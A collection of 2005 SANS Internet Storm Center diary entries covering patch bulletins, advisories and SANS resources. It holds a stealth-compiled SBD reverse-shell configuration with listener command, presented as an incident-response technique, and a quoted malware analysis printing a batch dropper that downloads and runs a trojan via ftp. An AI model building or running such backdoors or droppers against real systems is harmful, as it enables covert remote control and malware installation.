This has been a strangely quiet day on the Internet. I am not complaining mind you, however, days like this make being the Handler On Duty a really dull task and makes the Diary content difficult to come up with.

I have decided to take this lull in the action as an opportunity to look at our “Mother Organization” SANS and point you to some terrific resources that are available on the site.

So with that said, let’s get started with a little background and discussion regarding SANS Institute and what they have to offer.

Inside SANS Institute

The SANS (SysAdmin, Audit, Network, Security) Institute was established in 1989 as a cooperative research and education organization. Today thousands of people and organizations participate in the programs, conferences, and training that is offered. In addition thousands participate in the Internet Storm Center, DShield and the various newsgroups that are available through their forum.

SANS provides training and educational material, conferences and outstanding resources, such as the weekly vulnerability digest (@RISK), the weekly news digest (NewsBites), the Internet's early warning system (Internet Storm pCenter), flash security alerts and more than 1,200 award-winning, original research papers are free to all who ask.

Most of you are probably familiar with the SANS site at:


Let’s first look at the About SANS link. On this page you will find links to some of the most valuable resources and material available.


Programs of the SANS Institute:

•Information Security Training (more than 400 multi-day courses in 90 cities around the world)

•The GIAC Certification Program (technical certification for people you trust to protect your systems)

•Consensus Security Awareness Training (for all the people who use computers)

•SANS Weekly Bulletins and Alerts (definitive updates on security news and vulnerabilities)

•SANS Information Security Reading Room (more than 1,200 original research papers in 75 important categories of security)

•SANS Step-by-Step Guides (booklets providing guidance on protecting popular operating systems and applications)

•SANS Security Policy Project (free security policy templates - proven in the real world)

•Vendor Related Resources (highlighting the vendors that can help make security more effective)

•Information Security Glossary (words, acronyms, more)

•Internet Storm Center (the Internet's Early Warning System)

•SCORE (helping the security community reach agreement on how to secure common software and systems)

•SANS/FBI Annual Top Twenty Internet Security Vulnerabilities List

•Intrusion Detection FAQ (Frequently asked questions and answers about intrusion detection)

•SANS Press Room (Our press room is designed to assist the media in coverage of the information assurance industry.)

SANS sponsors the Wednesday Webcast where we present information on various topics ranging from the latest patches from Microsoft to the latest worm/virus outbreak to the latest in Information Security.

SANS publishes the TOP 20 List and a lot of papers that help with everything from Securing your Home Computer to Standards, Practices and Procedures.

Of course one of the best things that SANS has going for it is the terrific group of volunteers at the Internet Storm Center. We enjoy being here and interacting with all of the Diary readers. We are happy to answer your questions, take a look at suspicious files that you send to us, listen to your complaints, and in general just be here for all of you. I “volunteer” in a lot of groups, belong to several boards and committees and I can tell you that by far this is the one that I enjoy participating in the most.

This is just a sample of the interesting information available through SANS Institute. Check out the training schedule, conference schedule and available resources. Take some time browsing around. I think you will find something for everyone at:


Conference Links from Reader Submissions and a couple more;

Zack said "ISC2 has a list of some conferences in their Resource Guide for Today's Information Security Professional, (the "schedule" starts on about the 11th page)."

Juha-Matti submitted the Help Net Security

IrishMASMS submitted conference links at
, ,
and while there I saw a page with links to


Other conference links, of course there's
http://www.sans.org/">SANS, and the lists at , sity of Cambridge Security Conference List, Cipher's Calendar of Security and Privacy Related Events, and . Thanks everyone!

Thanks to Patrick Nolan for compiling the list of Conference Links for us.

Deb Hale

Handler On Duty
Published: 2005-06-16

UK Critical Infrastructure and Business Trojan Attacks (Updated), imap scanning, Opera vulns, Adobe Reader/Acrobat vuln, NIST Control Tool, Mailbag

UK Critical Infrastructure and Business Trojan Attacks

Britains NISCC
has issued "Breaking News" and is "warning that vital computer networks are at risk of attack." "The attackers’ aim appears to be covert gathering and transmitting of commercially or economically valuable information." "To learn more see the NISCC briefing Targeted Trojan Email Attacks"



UPDATE: Other Governments issue warnings. A principle concern is:

"The subject line and text of the e-mails appear relevant to the recipient’s work, or may be
copied from a previous legitimate e-mail;

"The attachment name and type appear relevant to the text and to the recipient’s work."(1)

(1) Canadian Cyber Incident Response Centre CCIRC

Australian Department of Defence DSD Advisory DA-2005-01


imap scanning

Port 143/imap has been targeted by a relatively low number of systems that are scanning higher than average numbers of Targets according to DShield data covering the last year. The notable dates are;

Date - - - - Sources -Targets

2005-06-11 - 82 --- 143,714

2005-06-02 - 83 --- 102,212
2005-05-02 - 57 ---- 94,422

2005-04-07 - 68 --- 102,246

There have been multiple imap vulnerabilities (and patches) announced by various vendors over the same time period (and earlier). They can be reviewed at;
FrSIRT "imap" string search results;

And "Thanks" FrSIRT for the site tweak!
Secunia "imap" string search - announcements by date;


Opera Cross Site Scripting and Security Bypass Vulnerabilities
FrSIRT has posted information about three Opera vulnerabilities, described at;

Opera Upgrade Links
"First Opera 8 upgrade released today, Oslo, Norway - June 16, 2005"

For Mac lovers, "Opera 8 delivers secure browsing to Macintosh - Oslo, Norway - June 16, 2005"

Verisign's "Internet Security Intelligence Briefing - June 2005" is available here:

http://www.verisign.com/static/030910.pdf Always a great read.

Mailbag - a Security Conference resource and subject matter question

I'll try to post useful answers to the areas of interest expressed in the next submission by the end of the shift.

Gary "was wondering if you could ask the readers of the diary which security conferences they find worthwhile to attend (besides the always educational SANS conferences, of course)? I have some money in the budget for training/conferences and not only was I unable to find a security conference that sounded interesting, I couldn't even find a calendar that listed upcoming conferences by various organizations. Does such a thing exist?"

Adobe Reader and Acrobat 7.0-7.0.1 vulnerability

XML External Entity vulnerability (Adobe Reader and Acrobat 7.0-7.0.1)
From Adobe - "Under certain circumstances, using XML scripts it is possible to discover the existence of local files" and "the impact is minimized due to the fact that the existence of local files can only be discovered if the complete filenames and paths are known in advance by the attacker." Upgrade links are at;



NIST Control Tool
I missed this announcement in April, better late than never, ymmv;
NIST SP 800-53 Database Application


General: The NIST SP 800-53 database application is a FileMaker runtime database solution. It represents the security controls that are organized into families for ease of use in the control selection and specification process. The security control structure consists of three key components: a control section, a supplemental guidance section, and a control enhancements section. The
minimum assurance requirements (i.e., low, moderate, and high) for security controls are applicable to each control. The user can browse the security controls based on various criteria, search for specific control, and export the control to various file types (e.g., tab-separated text file, comma-separated text file, XML, etc.)


The application is a self-contained read-only executable and requires at least 50 MB of free disk space. The NIST SP 800-53 database application requires Microsoft Windows 2000 or XP and will not run under Windows 9x. The database application has also been tested with Mac OS X Version 10.3.x.

Patrick Nolan


Published: 2005-06-15

Patch day fallout minor, Sun Java updates, and What to do about Windows NT?

Problems reported as a result of Microsoft patch day were rare,
and generally minor. One person reported that web pages no longer allow
content to be loaded into another frame in IE. We had conflicting
results on whether program defaults were reset by the patch set; some
people found that they were, others said their choices were left as is.

Sun Java vulnerabilities

Sun Java implementations (J2SE 1.4.2*, 5.0, and 5.0 update 1,
and Java Web start 5.0 and 5.0 update 1; Windows, Solaris, and Linux are
all affected) have vulnerabilities that "may allow an untrusted
application to elevate its privileges. For example an application may
grant itself permissions to read and write local files or execute local
applications that are accessible to the user running [the application or
applet]." J2SE 1.3.1_xx releases are not affected.

More details are available at:
, and

Many thanks to Peter Stendahl-Juvonen for bringing this to our

Windows NT

There's one thing that might be overlooked in the rush to patch
current Windows systems. Because Windows NT is unsupported (and Windows
2000's cutoff is rapidly approaching), you need to consider the effect
of leaving unpatched systems running. Many of the unpatchable
vulnerabilities are remote exploits of some form; as time goes on older
OS's are increasingly vulnerable.

This is certainly not peculiar to Windows OS's. The above
applies to any operating system for which patches are not being created.

-- Handler on Duty,

Published: 2005-06-14

Microsoft Releases 3 Critical Patches - Hilarity Does Not Ensue; MS Patches Reset Settings in Program Defaults?

Microsoft Releases 3 Critical Patches - Hilarity Does Not Ensue

Thanks to the other Handlers for their assistance in compiling this summary. All-in-all not a terrible list. -025 will probably lead to another round of e-mail worms with images in them which should be easy to filter (this should only impact end-user machines as one hopes you don't surf the web or check e-mail from your servers). -026 requires either the exploitation of a assumed good site, or tricking people to go to a malicious website; expect it to be used in the spyware/adware coming to a pop-up near you. For -027, that traffic should be filtered at your gateway anyway but may have some worm potential. I really hope you aren't running telnet (-033). -031 is the only real pain of the bunch where you'll have to search for orun32.exe to see if you have Interactive Training installed. It may or may not be in Add/Remove Programs.

Bulletin	Severity		Impact

MS05-025 Critical Remote Code Execution (replaces MS05-020) End-user machines only
MS05-026 Critical Remote Code Execution (replaces MS03-044, MS04-023, MS05-001)
MS05-027 Critical Remote Code Execution (replaces MS02-070, MS03-024)
MS05-028 Important Remote Code Execution
MS05-029 Important Remote Code Execution
MS05-030 Important Remote Code Execution
MS05-031 Important Remote Code Execution
MS05-032 Moderate Spoofing
MS05-033 Moderate Information Disclosure
MS05-034 Moderate Elevation of Privilege

Critical Vulnerabilities

<A href="http://www.microsoft.com/technet/security/bulletin/MS05-025.mspx">Microsoft Security Bulletin MS05-025 - Cumulative Security Update for Internet Explorer (883939) - Critical

This update replaces MS05-020
(<A href="http://www.microsoft.com/technet/security/Bulletin/MS05-020.mspx">http://www.microsoft.com/technet/security/Bulletin/MS05-020.mspx)

This patch addresses two main issues:

- A vulnerability in the parsing of PNG files. This vulnerability can
be exploited by a visit to a site hosting a malicious graphic file and
allows remote code execution due to an unchecked buffer in the PNG
rendering code.

- An issue in the XML <script> tag handling that can allow a remote
attacker access to read arbitrary XML files, and portions of other files
(by using a URL with the “src” attribute set to the local file system).

These vulnerabilities affect IE 5.1, 5.5 and 6 on virtually every
Microsoft platform. Also (and this is IMPORTANT) Outlook and Outlook
Express use IE’s HTML rendering engine and are vulnerable to these
issues. The both of these vulnerabilities could be exploited by HTML
email containing a malicious content.

Both of these issues have the potential to be used as part of an email
based virus and could be triggered under Outlook/OE simply by viewing
HTML formatted messages.

It also changes a few other things: Updates the MSIE pop-up blocker,
changes the handling of malformed .GIF and .BMP files, and removes
handling of XBM images from all IE platforms. It also sets the kill bit
for older versions of the Microsoft DigWebX ActiveX control and for all
versions of the Microsoft MsnPUpld ActiveX control. (Why, oh why, must
MS bundle these things together…?)


PNG: Un-register IE’s ability to render PNG files: run “regsvr32 /u
pngfilt.dll” (This can also be done via registry entries… see the MS
bulletin below).

XML: Setting IE’s “Internet” zone to “high security” will limit the
files exposed on the target machine.

Links of interest:




<A href="http://www.microsoft.com/technet/security/bulletin/MS05-026.mspx">MS05-026 (KB896358) - Vulnerability in HTML Help Could Allow Remote Code Execution

Affects: Essentially all active Windows platforms.

Replaces: MS03-044, MS04-023, MS05-001

HTML Help fails to validate input data which could result in the ability
of a remote attacker to execute code on an affected system.

An attacker would be required to host malicious content on a website or
via a banner ad. It appears currently that this cannot be exploited
through HTML email.

This may be a possible new avenue for spyware/adware or other bulk

Side effects: This security update restricts the use of the InfoTech
protocol (ms-its, its, mk:@msitstore) from processing content that is
served from outside the Local Machine zone. This change may prevent
certain kinds of Web-based applications from functioning correctly.

Workarounds: Un-register the ?InfoTech? protocol from HTML Help by
running ?regsvr32 /u %windir%\system32\itss.dll?

Links of interest:



<A href="http://www.microsoft.com/technet/security/bulletin/MS05-027.mspx">MS05-027 (KB896422) - Vulnerability in Server Message Block Could Allow Remote Code Execution. This patch addresses the following vulnerability:

- Server Message Block Vulnerability - A remote code
execution vulnerability exists in Server Message Block (SMB) that could
allow an attacker who successfully exploited this vulnerability to take
complete control of the effected system.

All supported versions of Windows 2000, XP, and Server 2003 appear to have
a severity rating of Critical on this vulnerability. However, XP SP2
systems will be less likely for attack as the affected ports are blocked
from responding by the Windows Firewall by default. Changes to the default
settings will cause the vulnerability to be at the same critical level as
Windows XP SP1.

As has been the standard practice, it is recommended that ports 139 and 445
be blocked at the firewall.

For more information about this vulnerability and the associated patch, see <A href="http://support.microsoft.com/kb/896422">Microsoft Knowledge Base Article 896422.

MS05-027 Update: There have been a few people who have written in expressing confusion on whether there needs to be authentication for this exploit to work. A plain reading of the bulletin by Microsoft indicates that this is a pre-authentication bug and that any anonymous user can theoretically exploit it.

Important Vulnerabilities

<A href="http://www.microsoft.com/technet/security/bulletin/MS05-028.mspx">MS05-028 (KB896426) - Vulnerability in Web Client Service. This patch addresses the following vulnerability:

- Web Client Vulnerability - A remote code execution
vulnerability exists in the way that Windows processes Web Client requests
that could allow an attacker who successfully exploited this vulnerability
to take complete control of the affected system. This vulnerability can
not be exploited by anonymous users as the attacker must have valid logon
credentials to allow the remote code execution and privilege elevation.

As has been the standard practice, it is recommended that ports 139 and 445
be blocked at the firewall. Additionally if this service is not required
for WebDAV aware applications, the service can be disabled to limit the

For more information about this vulnerability and the associated patch, see <A href="http://support.microsoft.com/kb/896426">Microsoft Knowledge Base Article 896426.

<A href="http://www.microsoft.com/technet/security/bulletin/MS05-029.mspx">MS05-029 (KB895179)- Vulnerability in Outlook Web Access for Exchange Server 5.5 Could Allow Cross-Site Scripting Attacks

- Exchange Server Outlook Web Access Vulnerability ()

Vulnerable: Exchange Server 5.5 SP4

This is a cross-site scripting vulnerability. The cross-site scripting
vulnerability could allow an attacker to convince a user to run a
malicious script. If this malicious script is run, it would execute in
the security context of the user. Attempts to exploit this vulnerability
require user interaction. This vulnerability could allow an attacker
access to any data on the Outlook Web Access server that was accessible
to the individual user.

Not Vulnerable: Exchange Server 2000 SP3 with post-SP3 Update Rollup,
Exchange Server 2003, Exchange Server 2003 SP1

Software Required for Update:

W2K SP3 - IE 5.01 SP3

W2K SP4 - IE 5.01 SP4

other OSes - IE 6 SP1

For more information about this vulnerability and the associated patch,
see <A href="http://support.microsoft.com/kb/895179">Microsoft Knowledge Base Article 895179

<A href="http://www.microsoft.com/technet/security/bulletin/MS05-030.mspx">MS05-030 (KB897715)- Cumulative Security Update in Outlook Express

- Outlook Express News Reading Vulnerability (<A href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1213">CAN-2005-1213)

A remote code execution vulnerability exists in Outlook Express when it
is used as a newsgroup reader. An attacker could exploit the
vulnerability by constructing a malicious newsgroup server that could
that potentially allow remote code execution if a user queried the
server for news. An attacker who successfully exploited this
vulnerability could take complete control of an affected system.
However, user interaction is required to exploit this vulnerability.

Vulnerable: Win98, Win98SE, WinME, W2K (SP3 and SP4), W2K3, WXP SP1, WXP
64-bit (RTM and SP1)

Not Vulnerable: W2K3 SP1, WXP SP2

Affected Software:

OE 5.5 SP2 on W2K (SP3 and SP4)

OE 6 SP1 on W2K (SP3 and SP4), WXP SP1, WXP 64-bit (RTM and SP1)

OE 6 on W2K3, WXP 64-bit

For more information about this vulnerability and the associated patch,
see .

<A href="http://www.microsoft.com/technet/security/bulletin/MS05-031.mspx">MS05-031 (KB898458) - Vulnerability in Step-by-Step Interactive Training Could Allow Remote Code Execution.

This patch addresses a vulnerability in the interactive training software installed by MS Press books and by some OEM computer manufacturers, this software is not installed by default on most systems. The attacker would have to create a malicious bookmark link, deliver it to the victim by email or on a web site, and have it executed. Interactive Training bookmarks use the extensions .CBO, CBL, .CBM. You can disable these extensions by editing the registry, uninstall the software, or apply the patch to mitigate this vulnerability. The presence of orun32.exe indicates that Interactive Training may be installed, versions earlier than are vulnerable.

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1212

Vulnerable: Windows 2000 SP3 and 4; Windows XP SP1 and 2; Windows XP 64-Bit
Edition SP1 (Itanium); Windows XP 64-Bit Edition Version 2003 (Itanium);
Windows XP Professional x64 Edition; Windows Server 2003 and SP1; Windows
Server 2003 and SP1 for Itanium; Windows Server 2003 x64; Windows 98 and SE;
Windows ME.

For more information about this vulnerability and the associated patch, see

Moderate Vulnerabilities

<A href="http://www.microsoft.com/technet/security/bulletin/MS05-032.mspx">MS05-032 (KB890046)- Vulnerability in Microsoft Agent Could Allow Spoofing.
This patch addresses the way Internet Explorer and Microsoft Agent can allow a
hostile web site to spoof trusted web content, take control of your system, and
execute arbitrary code. Assuming you are logged in as an admin. Setting all
Internet Explorer zones to high disabling ActiveX will break IE for some sites,
but also mitigate the vulnerability. What is Microsoft Agent you ask? Check
this web site for information: http://www.microsoft.com/msagent/default.asp

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1214

Vulnerable: Windows 2000 SP3 and 4; Windows XP SP1 and 2; Windows XP 64-Bit SP1
(Itanium); Windows XP 64-Bit 2003 (Itanium); Windows XP Professional x64;
Windows Server 2003 and SP1; Windows Server 2003 and SP1 for Itanium; Windows
Server 2003 x64; Windows 98 and SE; Windows ME.

For more information about this vulnerability and the associated patch, see

This patch addresses the following vulnerability:

- Telnet Vulnerability -
: An attacker who successfully exploited this information disclosure vulnerability could remotely read the session variables for users who have open connections to a malicious telnet server.
(You aren't still running telnet... are you?)

Vulnerable: Windows XP SP 1, XP 64-Bit (Pro, SP1, Professional); Windows 2003 Server with SP1, Windows Services for Unix 2.2, 3.0, and 3.5

Not Affected: Windows 2000 SP3 and SP4; Windows 98, 98 SE; Windows ME

For more information about this vulnerability see <A href="http://support.microsoft.com/kb/896428">Microsoft Knowledge Base Article 896428

<A href="http://www.microsoft.com/technet/security/bulletin/ms05-034.mspx">MS05-034 (KB899753) - Cumulitive Security Update for ISA Server 2000. This patch addresses the following vulnerabilities:

- HTTP Content Header Vulnerability - : A vulnerability exists in ISA Server 2000 because of the way that it handles malformed HTTP requests. An attacker could exploit the vulnerability by constructing a malicious HTTP request that could potentially allow an attacker to poison the cache of the affected ISA server. As a result, the attacker could either bypass content restrictions and access content that they would normally not have access to or they could cause users to be directed to unexpected content. Additionally, an attacker could use this in combination with a separate Cross Site Scripting vulnerability to obtain sensitive information such as logon credentials.

- NetBIOS Predefined Filter Vulnerability -
:An elevation of privilege vulnerability exists in ISA Server 2000 that could allow an attacker who successfully exploited this vulnerability to create a NetBIOS connection with an ISA Server by utilizing the NetBIOS (all) predefined packet filter. The attacker would be limited to services that use the NetBIOS protocol running on the affected ISA Server.

Vulnerable: Microsoft ISA Server 2000 SP 2; Microsoft Small Business Server 2000 and 2003 Premium (which include ISA Server)

Not Affected: Microsoft ISA Server 2004 Standard and Enterprise

For more information about this vulnerability see <A href="http://support.microsoft.com/kb/899753">Microsoft Knowledge Base Article 899753

Bulletin Updates

- : Bulletin updated to announce the availability of an updated package for .NET Framework 1.0 Service Pack 3 for the following operating system versions: (887998) Windows XP Tablet PC Edition and Windows XP Media Center Edition.

: Microsoft updated this bulletin today to advise customers that a revised version of the security update is available. We recommend installing this revised security update even if you have installed the previous version.

: Updated technical information in the FAQ with additional details around cluster installation and to advise of an updated KillPwd utility.

MS Patches Reset Settings in Program Defaults?

It appears that when you install patches that the settings in "Set Program Access and Defaults" (underneath Add/Remove Programs) in XP SP2 Professional get reset to the defaults (i.e. Microsoft Products) when patching is performed. For instance, in the "Other" section, I had set my default web browser to Firefox and default media to iTunes, and patching undid that. Has anyone else experienced this?


John Bambenek

bambenek -at- gmail.com
Published: 2005-06-13

iframeDOLLARS.biz redux ; P2P == Prepare to Patch ; I'm the MAP ; Remote Malware Acquisition

I thought a few things were news worthy today, that and after a recent conversation with another Incident Responder interested in improved malware recovery techniques I wanted to share a method that I've been happily using for a while now in performing remote host analysis for the identification and retrieval of malicious code samples.

iframeDOLLARS.biz redux

Holy smokes, the iframeDOLLARS business practice is back up and running at (www.iframedollars.biz) and (bestcounter.biz) We've also received reports of malicious hosting at I personally (NOT SANS!!!) highly recommend these domains and IPs for blackholing on your networks. While you're at it, if you manage large proxies and find new hits for iframeDOLLARS exploits, we'd like to hear about them.

(p2p) It's free, so Prepare to Patch

It's Fr^h^hMonday the 13th, so p2p. I'm not talking about installing spyware and adware riddled software that tempt you to violate multiple laws by gaining access to free warez/music/etc... I'm talking about "p2p" as in "Prepare to Patch". Be forewarned that there are more than a few patches of significance that will become available for an operating system near you starting Tuesday the 14th. Oh yeah, by the way, these patch downloads are also free!

The SANS handlers have received a vendor notice from ISS of a potential incompatibility with specific BlackICE product versions running on Windows 2000 that may conflict with a revision of a Microsoft patch scheduled for release on June 14th. BlackICE users on Windows 2000, Please make sure your engine is running BlackICE PC/Server Protection version "cnr".

The MAP - and this one is not in Dora the Explorer's backpack

The availability of the from iDefense.com was posted in several forums last week. I'm intrigued and will be checking it out soon. Even though I have a strong preference for doing this type of work on a unix platform, based upon a quick read of included tool features there looks to be a few native Windows analysis functions that I wouldn't know how to replicate in the linux world.

Remote Malware Acquisition with SBD

I have an ongoing need to investigate and assist other investigators with remote machines to identify malware as well as retrieve suspicious/obvious samples. I do not often require full GUI console access to get to the root of the problem, so talking someone through the installation of VNC or configuration of terminal services can be a tedious experience. I have found that using SBD which is available from
http://tigerteam.se/dl/sbd/ gave me pretty much all I needed. Just a simple encrypted command line reverse shell delivered to a host of your choosing. SBD, aka ShadowInteger's Backdoor (and no it's not really as evil as it sounds) supports compilation on both unix and win32(cygwin/mingw) environments. Several AntiVirus vendors have started flagging this tool as a PUP - a Potentially Unwanted Program. True Enough, most security tools are double edged swords.

Download the source for yourself. I still use sbd-1.33, it's certainly stable enough for my purposes. A shortcut to creating your custom sbd binary follows:

I recommend making the following modifications to sbd.h header define variables suitable for your environment.

#define HOST "IP.or.host.name" // Your sbd binary will connect back to this.
#define PORT 10001 // The port your binary will attempt to connect.
#define EXECPROG "cmd.exe" // SBD will send you an encrypted shell
#define ENCRYPTION 1 // well, not encrypted if you don't set this variable
#define SHARED_SECRET "Sup3rDup3rp455w0rd" // This is my personal AES shared secret, NOT!
#define RESPAWN_ENABLED 1 // If you accidentally drop the reverse shell
#define RESPAWN_INTERVAL 120 // It will attempt to reconnect in 2 hours.
#define QUIET 1
#define VERBOSE 0
#define DAEMONIZE 1

To build your Windows binary, execute the following from a Cygwin Bash shell

$ make win32bg CFLAGS=-DSTEALTH

If all goes well your new SBD binary is now hardcoded to perform a specific action by default which is to connect back to your host and present you with a cmd.exe shell.

To receive a connection from a suspect host, make sure you're running an appropriately configured sbd binary. The same binary can be used as sending client or receiving server.

On my linux host using a linux SBD binary of course, I first start a typescripting session so that I will have a log of everything I've done remotely, then I execute the following:

sbd -k Sup3rDup3rp455w0rd -l -p 10001 -r 0

Once you have your sbd listener waiting you can provide phone/email/IM/pager instructions to your remote workstation user to grab and execute your custom sbd binary. The remote user should not have to provide any fancy command line arguments, and while it's bad security form they can even execute directly from your webpage. I leave a web server and tftp server available for tool retrieval and tftp uploads enabled so I can push malware samples back to myself.

Once the remote user executes your custom SBD binary you should have a command shell appear in the window you just executed your sbd listener in. Yay, let the healing begin.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

At this point your creativity as an Incident Responder is the only limit.

TFTP retrieval of tools.

Directory listings in reverse order 'dir /od'

Hidden file listings 'dir /od /ah'

Registry run key listing using 'reg' (XP)

TFTP upload of malicious samples.
To bring this diary to a close, I leave it as a challenge for another handler to present you with an IR SBD based methodology that utilizes only the tools available to the default unmodified native operating system vs. a methodology that leverages the retrieval of supporting analysis tools. If the challenge is not accepted, I'll share my process.

Build it. Use it. Finally, Let us know how you use it.

Thanks, and we'll leave the light on.

William Salusky
wsalusky at gmail dot com
Handler on Duty (heh heh, Duty)


Published: 2005-06-11

AUP/Terms of Service Agreements

Reading AUP's on a slow day

"What do you mean I violated my AUP? I don't *have* an AUP! ... do I? ..."

Since it is a *very* slow day, I thought I would take the opportunity to remind all of our readers to take a minute and review their AUP. Otherwise, you may wind up without your internet one day, without a lot of explanation.

"What is an AUP" you ask? An AUP, or Acceptable Use Policy, (also called "Terms of Service") is essentially the rules of behavior of which an individual or company is bound to when they sign up with an ISP for internet connectivity. Even Google has an AUP, which applies to everyone who uses Google to search for whatever their heart desires.

Some of the more commons ones you may be interested in....

Earthlink - Careful how much you post...

"EarthLink considers "multiposting" to 10 or more groups within a two week sliding window to be excessive. EarthLink servers currently limit the number of allowable "cross-posts" to 9"


Verio - Using your home network for some pen testing....

"any activity that might be used as a precursor to an attempted system penetration (i.e. port scan, stealth scan, or other information gathering activity)"


Tony Carothers

Handler on Duty

tony d0t carothers at gmail d0t com


Published: 2005-06-10

Mailbag Question, ZoneAlarm failure update, Michael Jackson Malware analysis, More on HIDS, IM Name Game submissions

A Question for System Profilers

A contributor has asked if anyone has information related to scans that they have received from remote systems with the following port profile:

22/tcp open ssh?
53/tcp open domain ISC Bind 9.2.1
6703/tcp open unknown
6721/tcp open unknown
6722/tcp open unknown
6723/tcp open unknown
6737/tcp open unknown
6750/tcp open unknown
6760/tcp open unknown
6767/tcp open unknown

"Please note the text returned from connections to port 22: "I wish I was special". There appears to be no actual sshd daemon listening. A scan of the high 6700 ports returns no data from any of the open ports."

ZoneAlarm Failure Update

We have been contacted by ZoneLabs (A Check Point Company) about yesterdays Diary entry and have been asked to post a link to their statement . According to a follow-up response to a question posed to ZoneLabs;

"Users using the ProgramAdvisor service in Automatic mode were potentially affected.

No systems were exposed as a result of the issue.

The firewall would not go into 'deny all', but would continue to enforce the current policy at the time the error occurred."
ZoneLabs -
Thanks for the answer!

Michael Jackson Suicide Note Malware

Several AV vendors are reporting the spreading of an email with a clickable link supposedly pointing to additional information on a Michael Jackson suicide note. Clicking the link takes the victim to a web site that installs malware using exploits customized for different browsers. The Storm Center received an excellent analysis of the malware from Matt Corothers and he has allowed us to reprint it here. Thanks, Matt!

"The server at abcnews-go.com was distributing malware via browser exploits (including Firefox). When you load the site, you get a fake "site is currently suspended" message, and a php script included as javascript checks your ip and browser. The first time you hit the site from a given ip, the php script then outputs some javascript that forwards you to the exploit page for your browser. Subsequent hits return nothing.

The exploit creates this batch file which downloads and executes a trojan via ftp from the same ip:

echo open>c:\1.dat
echo ls>>c:\1.dat
echo binary>>c:\1.dat
echo recv 1.exe c:\1.exe>>c:\1.dat
echo quit>>c:\1.dat
ftp -n -s:c:\1.dat -A
start /min c:\1.exe
del c:\1.dat


1.exe periodically posts information about the infected computer to a cgi script at nugget-sales.com, currently

The CGI responds with commands, the first of which is for the trojan to update itself using http to rplay93.exe appears to be a different version of the same malware. It also periodically posts to the nugget-sales.com. Other than the update command, I'm not really sure what the trojan is supposed to be doing. Part of the cgi response appears to be a command to load www.microsoft.com, which it does occasionally.

Some of the IP addresses and links are still alive at the time of this writing, so exercise caution if your curiosity gets the best of you. The malware may also reappear at other sites in the future. Additional details are available on most major AV vendor sites.

Opinion - More on HIDS

Configuring HIDS Agents for important "event" reporting is always an interesting subject, one would hope that more than one set of eyes is involved in selecting the events to be reported. As noted in "The Tao of Network Security Monitoring Beyond Intrusion Detection", "the alert is only the beginning of the quest, not the end." Success here depends, of course, on the "Agent" capabilities/configurability and the range of experiences of the "team" selecting and classifying the importance of the events, events that are important for the environment where the Agents are deployed.

Over the _years_ I've found that IntersectAlliance's products for *.nix, Windows and some MS's apps, are as configurable as they get. I've also read other public posts about this product's performance. Extending this opinion, a
contributor recently sent in a link to a recent MS document that has a basic list of events to consider. I regret I don't have the contributor's name anymore so I can publically thank them for sending in the link, but "Thanks!".

So ... I'm soliciting Diary contributor suggestions for other lists of *Nix events that should be considered for logging with *.Nix or MS HIDS Agents. I'll post the list in my Diary next week. Anyone with product specific precompiled lists of "important" events logged is also invited to share (within the confines of your license!).


are "Free, Open-Source, audit and event log agent software for a (HUGE/pn) variety of operating systems, and applications." Home users might consider giving the a whirl too, it's a "A basic, free, Open-Source, centralised audit and eventlog collection tool for Windows" and anything else that can export to syslog.

Microsoft's Document is
<A HREF="http://www.microsoft.com/downloads/details.aspx?FamilyID=95a85136-f08f-4b20-942f-dc9ce56bcd1a">
The Security Monitoring and Attack Detection Planning Guide

More on Snare at the SANS Reading Room.

The Tao of Network Security Monitoring Beyond Intrusion Detection By Richard Bejtlich, available online at

Other Other related resources are at
, read the tool's PDF's that come with the download.

IM attack Name Game Responses

, "It's not meat, but it works: LIMA - layered instant message

Anonymous said "Not balogna but Wiener. There was an old commercial jingle, "I wish I were an Oscar Mayer wiener ..." Maybe wiener-job or wiener-work, etc. Thanks for all the great work you do."

Robert Darin said "Simple: WIMP - Windows IM parasite. Windows because only Microsoft based platforms are as risk to this type of cheap and pathetic attack."

Rhen Alderman suggested "phim" as an acronym for a ****** Instant Messenger.

Another anonymous suggestion - "You could always go with Wiener--as in, 'you've been wienered,' for Oscar-family

And Jason Martin suggested "Instant Messaging --> In-Stunt Messaging. Or even In-Stunt Messa-Gang.".

Thanks everyone!

Patrick Nolan, with grateful assists from other Handlers and Contributors.
Published: 2005-06-09

ZoneAlarm shutdown problem update, MS Black Tuesday

ZoneAlarm Update

An update report from a Diary contributor says: "The affected version of ZoneAlarm was The newer fixed version of ZoneAlarm is (hey it looks the same!) Why they couldn't just use that fourth numbering component and change .000 to .001 is a mystery. If you download the file, right-click on it and look at the properties, the broken version of ZoneAlarm Pro will be file version '' and has the description 'ZoneAlarm Pro-1025-English'. The newer version will have a description of 'ZoneAlaram Pro-1043-English'. For the freeware ZoneAlarm, the newest update available to download has a description of 'ZoneAlarm-1013-English'. I don't know what the description value was for the affected version."
Thanks for the contribution!

Earlier Diary Entries

ZoneAlarm Problems

ZoneAlarm ( A Check Point Company) users were lighting up ZoneLABS user forums yesterday with reports of the firewall shutting down. ZoneLABS issued an advisory .

"Vulnerable" MS OS and application list

See "Microsoft June Advance Notification Unspecified Security Vulnerabilities"

The MSSRC Blog says MS will release "7 bulletins affecting Windows. The maximum severity rating for these security updates is Critical and some will require a restart.

1 bulletin affecting Windows and Microsoft Services for UNIX. The, maximum severity rating for this is Moderate and may require a restart.

1 bulletin affecting Microsoft Exchange. The maximum severity rating for this security update is Important and it will not require a restart.

1 bulletin affecting Microsoft Internet Security and Acceleration (ISA) Server and Small Business Server. The maximum severity rating for these security updates is Moderate and may require a restart."

And Juha-Matti adds another pointer to what's coming with a pointer to:
CAN-2005-1907 (under review)
"The ISA Firewall service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (Wspsrv.exe crash) via a large amount of SecureNAT network traffic."
Thanks Juha-Matti!

The Co$t of Security

Over at TheRegister, in the article "Symantec ask court to rule Hotbar.com as adware", it says "In other spyware-related news, Dell said that better customer awareness and sales of security software subscriptions had halved the number of support calls it was receiving about spyware-related problems over the last year."


Cisco - Cisco 802.1x Voice-Enabled Interfaces Allow Anonymous Voice VLAN Access

Cisco has released a Cisco Security Notice in response to an advisory released by FishNet Security on June 8, 2005 entitled "Cisco 802.1x Voice-Enabled Interfaces Allow Anonymous Voice VLAN Access"



Published: 2005-06-08

